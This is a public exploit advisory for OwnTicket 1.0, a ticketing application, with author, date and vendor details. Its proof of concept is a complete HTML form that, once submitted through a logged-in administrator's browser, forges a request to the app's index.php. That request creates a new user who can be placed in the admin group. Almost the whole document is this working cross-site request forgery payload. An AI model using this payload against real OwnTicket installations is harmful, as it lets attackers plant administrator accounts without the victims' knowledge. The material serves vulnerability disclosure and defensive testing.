OwnTicket 1.0 Cross Site Request Forgery

`# Exploit Title: OwnTicket 1.0 - Cross Site Request Forgery (Add Addmin)  
# Exploit Author: Mr Winst0n  
# Author E-mail: [email protected]  
# Discovery Date: March 10, 2019  
# Vendor Homepage: https://ownticket.sourceforge.io/  
# Software Link : https://sourceforge.net/projects/ownticket/files/latest/download  
# Tested Version: 1.0  
# Tested on: Kali linux, Windows 8.1   
  
  
# PoC:  
  
<html>  
<body>  
<form class="form-horizontal" role="form" id="user" name="user" method="POST" action="http://localhost/[PATH]/index.php" >  
<input type="hidden" name="_FORM" value="user">  
<div class="row">  
<div class="col-md-10 col-md-offset-1">  
<div class="panel panel-default">  
<div class="panel-heading">  
<div class="form-group">  
<div class="col-md-12 text-center">  
<h3>Neuen User anlegen</h3>  
</div>  
</div>  
</div>  
<div class="panel-body">  
<div class="form-group">  
<label for="DATE_MODIFY" class="col-md-2 control-label">ID</label>  
<div class="col-md-3">  
<input readonly="readonly" id="ID" type="text" class="form-control" name="ID" value="0">  
</div>  
<label for="DATE_CREATE" class="col-md-2 control-label col-md-offset-2">Erstellt</label>  
<div class="col-md-3" >  
  
<input disabled id="DATE_CREATE" type="text" class="form-control text-center" name="DATE_CREATE" value="10.03.19 11:53">  
</div>  
  
</div>  
<div class="form-group">  
<label for="LOGIN" class="col-md-2 control-label">Login Name</label>  
<div class="col-md-10">  
  
<input autocomplete="off" id="LOGIN" type="text" class="form-control" name="LOGIN" value="" required autofocus>  
</div>  
</div>  
<div class="form-group">  
<label for="FULL_NAME" class="col-md-2 control-label">Kompletter Name</label>  
  
<div class="col-md-10">  
<input autocomplete="off" id="FULL_NAME" type="text" class="form-control" name="FULL_NAME" value="" required>  
</div>  
</div>  
<div class="form-group">  
<label for="EMAIL" class="col-md-2 control-label">E-Mail</label>  
<div class="col-md-10">  
<input autocomplete="off" id="EMAIL" type="email" class="form-control" name="EMAIL" value="" required>  
</div>  
</div>  
<div class="form-group">  
<label for="TICKET_GROUP_ID" class="col-md-2 control-label">Ticket Gruppe</label>  
<div class="col-md-10">  
<select class="form-control" name="TICKET_GROUP_ID">  
<br />  
<option value="7">(0) Ungruppiert</option>  
<br />  
<option value="11">(10) Entwicklung</option>  
<br />  
<option value="9">(10) IT</option>  
<br />  
<option value="10">(10) Support</option>  
<br />  
<option value="8">(10) Veraltung</option>  
<br />  
<option value="12">(30) GeschA$?ftsleitung</option>  
</select>  
</div>  
</div>  
<div class="form-group">  
<label for="USER_GROUP_ID" class="col-md-2 control-label">User Gruppe</label>  
<div class="col-md-10">  
<select class="form-control" name="USER_GROUP_ID">  
<br />  
<option value="7">default</option>  
<br />  
  
<option value="8">user</option>  
<br />  
  
<option value="9">operator</option>  
<br />  
  
<option value="10">management</option>  
<br />  
<option value="11">admin</option>  
</select>  
</div>  
</div>  
<div class="form-group">  
<label for="SORT" class="col-md-2 control-label">Sortierung</label>  
<div class="col-md-3">  
<input type="number" min="0" max="999" title="Format: 3 digits" id="SORT" class="form-control " name="SORT" value="10" required >  
</div>  
</div>  
<div class="form-group">  
  
<label for="PASSWORD" class="col-md-2 control-label">Passwort</label>  
<div class="col-md-3">  
<input autocomplete="off" id="PASSWORD" type="password" class="form-control" name="PASSWORD" value="" required >  
</div>  
</div>  
<div class="form-group">  
<div class="col-md-6 pull-right">  
  
<div class="col-md-12 well">  
<div class=" text-center ">  
  
<button class="btn btn-primary" type="submit" name="BUTTON_SAVE">  
Speichern <i class="glyphicon glyphicon-floppy-disk"></i>  
</button>  
  
<a href='http://localhost/[PATH]/index.php?user' class="btn btn-info" type="submit" name="">  
Zur&uuml;ck <i class="glyphicon glyphicon-new-window"></i>  
</a>  
</div>  
</div>  
</div>  
</div>  
</div>  
</div>  
</div>  
</div>  
</form>  
  
</body>  
</html>  
`